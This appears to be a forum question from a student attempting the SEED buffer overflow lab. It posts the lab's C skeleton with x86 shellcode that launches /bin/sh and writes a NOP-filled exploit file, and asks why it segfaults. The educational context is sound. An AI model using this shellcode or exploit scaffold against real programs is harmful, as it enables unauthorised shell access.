# Creating buffer overflow in C (seg fault)

Tags: c, buffer-overflow

Since our security course doesn't have a lab, i'm trying to solve the Seed project's lab .

http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/Buffer_Overflow.pdf

But there seems to be a problem , The code is not doing the exploit instead it's giving segmentation fault error . Is there something else must be added to the code in order to make it functional ?
The lab says that i have to edit the code below

```
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
```

Comment: You should post here what you are trying to compile, there are a number of programs in that document you attached.

Comment: Well... usually you have to use the segmentation fault to inject your shellcode :D, nasty things you want to do here... Uhmm... I like it.

Comment: @Raistmaj 
Educational purposes only :P ...No nasty stuff ...
And the lab document says that the result should be a shell not a segmentation fault :(

Comment: Check this long article, maybe helps you http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html